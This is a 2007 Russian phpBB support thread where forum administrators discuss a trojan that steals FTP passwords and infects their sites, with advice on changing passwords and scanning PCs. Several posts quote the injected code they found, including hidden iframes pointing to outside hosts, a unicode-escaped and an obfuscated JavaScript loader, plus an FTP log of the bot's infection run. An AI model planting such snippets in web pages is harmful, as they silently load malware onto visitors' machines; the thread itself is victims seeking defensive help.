Как убить Трояна?

AdmninsCluba · Сообщение **AdmninsCluba** » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

crash · Сообщение **crash** » 23.05.2007 10:02

amelanin писал(а):пароли свистят из ftp менеджера, в основном тотал-коммандера

заметьте просто так никто свистнут не может. Выходит что у вас вирус на компе)

amelanin · Сообщение **amelanin** » 23.05.2007 10:16

угу... оно самое...
впрочем по ссылке выше там есть отчет лаборатории касперского. вирус находится на компе и самостоятельно иницирует ftp сессии для заражения сайтов.
само заражение происходит именно через браузер - при посещении зараженного сайта. в результате образуются новые файлы в папке виндовс. в том числе 0.log

Добавлено спустя 1 минуту 35 секунд:

да и в c:\program files\system102 появляется файл с паролями иногда

Данила мастер · 30.06.2007 23:13

Схожая проблема. Есть форум - http://forum.vendinfo.ru/ (версия 20-я если не ошибаюсь).

В последнее время участились жалобы от пользователей, у которых стоит касперский, типа такого:

Касперский раз десять радостно сообщил мне, что по данному адресу сидит вредоносный Троян:
============================================
обнаружено: троянская программа Trojan-Downloader.JS.Agent.ga
URL: http://forum.vendinfo.ru/viewtopic.php?t=494//viewtopic
============================================
Ежели кто-то что-то про это знает...
Неужели действительно кто-то подсадил туда трояна? Хотя, судя по предыдущим постам, с сайтом не совсем все в порядке.....

svk · Сообщение **svk** » 01.07.2007 1:02

недавно столкнулся. у меня код прописался в config.php,auth.php и конец index.php
а вот откуда он взялся - так и не выяснил. стояла версия 21...

crash · Сообщение **crash** » 01.07.2007 7:15

svk
меняй сразу фтп пароли на всякий случай)

Tirielle · Сообщение **Tirielle** » 01.07.2007 18:10

Тоже получила такой же вирус на свой форум, где я админ, причем даже форум перестал работать, выдавая сверху набор ошибок.

Вопрос- я посмотрела тот список файлов, что был выше, все вычистила, загрузила заново. Этот вирус находится у меня на машине? Или на машине у хостера? Как поменять пароль на фтп? Я ламер в этом

amelanin · Сообщение **amelanin** » 02.07.2007 23:05

этот вирус находиться именно у вас на машине и от вас самостоятельно в произвольный момент времени инициируя фтп-сессию заражает ваш сайт... как вариант если не вы одна имеете доступ к фтп вашего сайта - проверить надо все компы имеющие доступ по фтп к сайту. пароли на доступ надо менять через админку хостера и больше их в фтп-менеджерах не хранить! и вообще лучше хранить пароли записаными на бумаге... или в крайнем случае в текстовом документе на дискете отдельно от компа. потому как троян совершенствуется и может пройтись по компу в поисках файлов с паролями.

компьютер проверить касперским либо доктором веб.

зы - в этой проблемме самое страшное паника при начале заражения... выше описано как происходит заражение, откуда, и как с ним бороться... самый простой путь не хранить пароли доступа к сайту на компе.

Сообщение **Xpert** » 03.07.2007 21:49

Подробности по одной из версий трояна:
http://www.viruslist.com/ru/viruses/enc ... sid=147349

Forester4x4 · Сообщение **Forester4x4** » 25.07.2007 1:47

а я вот сегодня днем сначала форум почистил от
примерно такого кода как писал Xpert

<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>

а только што , опять словил
вот такую байду

Код: Выделить всё

<!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0062
\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u0066\u0072
\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d
\u0030\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0065\u006c\u0069\u0074\u0077\u0061
\u0072\u0065\u007a\u002e\u0072\u0075\u002f\u0031\u002f\u0074
\u0064\u0073\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e
\u0070\u0068\u0070\u0022\u003e\u003c\u002f\u0069\u0066\u0072
\u0061\u006d\u0065\u003e')</script><!-- c65 -->

я в шоке...

crash · Сообщение **crash** » 25.07.2007 2:44

Forester4x4
и пароли поменяли на фтп и все остальное?

Forester4x4 · Сообщение **Forester4x4** » 25.07.2007 7:43

crash

отпрвил письмо хостеру, пока не поменял

причем интересно по логам ftp смотреть... все четко, бот зашел, скачал файл, потом сразу залил
привощу лог если кому интересно

Код: Выделить всё

2007-07-24 21:46:46  2694  203.223.159.210:47444->81.177.24.116:21  login
2007-07-24 21:47:42  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/.BACKUP/install/index.htm
2007-07-24 21:47:44  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/.BACKUP/install/index.htm
2007-07-24 21:47:47  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/admin/index.php
2007-07-24 21:47:49  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/admin/index.php
2007-07-24 21:47:50  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/attach_mod/includes/index.htm
2007-07-24 21:47:52  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/attach_mod/includes/index.htm
2007-07-24 21:47:53  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/attach_mod/index.htm
2007-07-24 21:47:56  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/attach_mod/index.htm
2007-07-24 21:47:57  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/cache/index.htm
2007-07-24 21:47:59  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/cache/index.htm
2007-07-24 21:48:00  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/db/index.htm
2007-07-24 21:48:02  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/db/index.htm
2007-07-24 21:48:03  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/files/index.php
2007-07-24 21:48:05  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/files/index.php
2007-07-24 21:48:06  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/images/avatars/index.htm
2007-07-24 21:48:08  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/images/avatars/index.htm
2007-07-24 21:48:09  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/images/index.htm
2007-07-24 21:48:11  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/images/index.htm
2007-07-24 21:48:12  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/includes/auth.php
2007-07-24 21:48:15  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/includes/auth.php
2007-07-24 21:48:16  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/includes/index.htm
2007-07-24 21:48:18  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/includes/index.htm
2007-07-24 21:48:20  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/index.php
2007-07-24 21:48:23  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/index.php
2007-07-24 21:48:24  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/language/index.htm
2007-07-24 21:48:26  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/language/index.htm
2007-07-24 21:48:27  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/language/lang_english/index.htm
2007-07-24 21:48:31  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/language/lang_english/index.htm
2007-07-24 21:48:33  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/language/lang_russian/index.htm
2007-07-24 21:48:34  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/language/lang_russian/index.htm
2007-07-24 21:48:36  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/login.php
2007-07-24 21:48:38  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/login.php
2007-07-24 21:48:40  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/templates/Charcoal2/index.htm
2007-07-24 21:48:41  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/templates/Charcoal2/index.htm
2007-07-24 21:48:43  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/templates/index.htm
2007-07-24 21:48:44  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/templates/index.htm
2007-07-24 21:48:46  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\forum/templates/subSilver/index.htm
2007-07-24 21:48:47  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\forum/templates/subSilver/index.htm
2007-07-24 21:48:49  2694  203.223.159.210:47444->81.177.24.116:21 
download  stalker4x4-ru_5650a7ad\index.html
2007-07-24 21:48:50  2694  203.223.159.210:47444->81.177.24.116:21  upload
 stalker4x4-ru_5650a7ad\index.html
2007-07-24 21:48:51  2694  203.223.159.210:47444->81.177.24.116:21  logout

crash · Сообщение **crash** » 25.07.2007 7:58

Forester4x4
пароли менять сразу надо

Club-16 · Сообщение **Club-16** » 16.08.2007 13:58

Сегодня пользователь сообщил, что у него Касперский начал матюкатся на форум, нашел: trojan-downloader.HTML.Agent.ez

Недавно только со всех файлов форума по убирал вот такое:

Код: Выделить всё

<!--start_frame0xf--//>
<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') 
!= -1) { document.writeln('<iframe src="http://alert-ca.com/kot-rus/index.php" width=1 height=1 style="display:none"></iframe>'); }</script>
<!--end_frame0xf--//>

Ну в прошлом понятно, что вводишь в поиск файлов

Код: Выделить всё

http://alert-ca.com

и он тебе все файлы найдет, а тут я даже не знаю, что мне делать.
HELP!

Добавлено спустя 6 минут 16 секунд:

Увидел такое в коде на главной:

Код: Выделить всё

<body><script language=JavaScript>function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,40,20,48,17,28,38,43,6,
44,0,0,0,0,0,0,8,9,16,55,56,51,3,34,23,41,46,35,57,12,49,45,47,42,7,62,
26,11,50,32,30,59,15,0,0,0,0,53,0,52,18,10,31,24,25,36,61,58,22,60,37,
54,29,39,5,2,33,0,1,13,14,4,21,19,27);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(152^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}
sban('g8P0QodhhKYiQPdI0qZY9KJ1CXzQ7KX0hEPONzP0CdUYCSUJPR
Z09FdIIGUkhR003EXIIGYi9RvhhHiPJR0iN7dkaRZYrUckNEZ0hz010TcIC8
P0Qodhhzc')</script><!-- s5.freehost.com.ua -->

Это вирус или паранойя?

Alek$ · Сообщение **Alek$** » 16.08.2007 14:32

Про последний кусок: похоже на банеропоказывалку, вставляемую хостером, но гарантироваь не могу.

Про первую: а если удалить удалить эту странную баннеропоказывалку, то не ругается?

ЗЫ Разбейте код на несколько строк, чтобы в экран помещалось.

MAzZY · Сообщение **MAzZY** » 16.08.2007 21:00

Это вирус.
Вычищай код от таких вставок и не храни пароль в проге, с помощью которой заходишь на фтп.
Ну и, естественно, лечи комп

phpBB Guru - Официальная русская поддержка форума phpBB3

Как убить Трояна?

Как убить Трояна?

Троян, помогите!